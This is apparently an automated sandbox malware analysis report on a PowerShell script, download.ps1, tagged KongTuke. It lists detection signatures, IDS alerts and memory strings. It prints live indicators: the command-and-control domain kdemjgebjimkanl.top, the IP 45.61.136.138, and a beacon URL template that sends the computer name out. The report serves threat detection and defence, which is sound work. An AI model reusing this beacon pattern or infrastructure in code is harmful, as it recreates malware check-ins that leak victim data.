
Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1582507
MD5: 237f43b9f810e6c6a16c22f7b13d3432
SHA1: 819211cf07c4070f99e7cad5905a1e3f4865628e
SHA256: f0b02355a54d79467e35c12fe9b31d8f69f0bca52aef5fcf684d9b160ba561f0
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 4280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4280, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4280, ProcessName: powershell.exe
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-12-30T19:15:04.888420+0100  2057741  1         A Network Trojan was detected  192.168.2.4  49730        45.61.136.138    80                TCP
2024-12-30T19:15:04.888420+0100  1810000  1         Potentially Bad Traffic        192.168.2.4  49730        45.61.136.138    80                TCP
2024-12-30T19:15:05.867335+0100  1810000  1         Potentially Bad Traffic        192.168.2.4  49731        142.250.185.132  80                TCP

AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 90.6% probability
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb} source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbO source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1792982780.0000022F4278F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb364e35 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42C56000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.132:80
Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: Network traffic; Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 45.61.136.138
Source: Joe Sandbox View; ASN Name: AS40676US
Source: global traffic; HTTP traffic detected: GET /67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: kdemjgebjimkanl.top Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: kdemjgebjimkanl.top
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://kdemjgebjimkanl.top
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1794758890.0000022F42B91000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C0FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C294000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C290000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.comv
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B4B9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/w
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9BAC7F66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9BAC8D12
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3LxOaE4bV5w1Aj7zB-RroBoC5kncsnz" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwiUiuzVjNCKAxUrS_EDHf_FFr8QnIcBCAU"><a href="https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source%3Dsmp.2023carterhpp.2%26stick%3DH4sIAAAAAAAA_zu04eRyNhYpJgGGW-cOnOVk4mAAAAs3vRsSAAAA&amp;source=hpp&amp;id=19046191&amp;ct=3&amp;usg=AOvVaw1DdLddPyaDlZCddFvNE2w3&amp;sa=X&amp;ved=0ahUKEwiUiuzVjNCKAxUrS_EDHf_FFr8Q8IcBCAY" rel="nofollow">President Jimmy Carter, 1924 - 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var 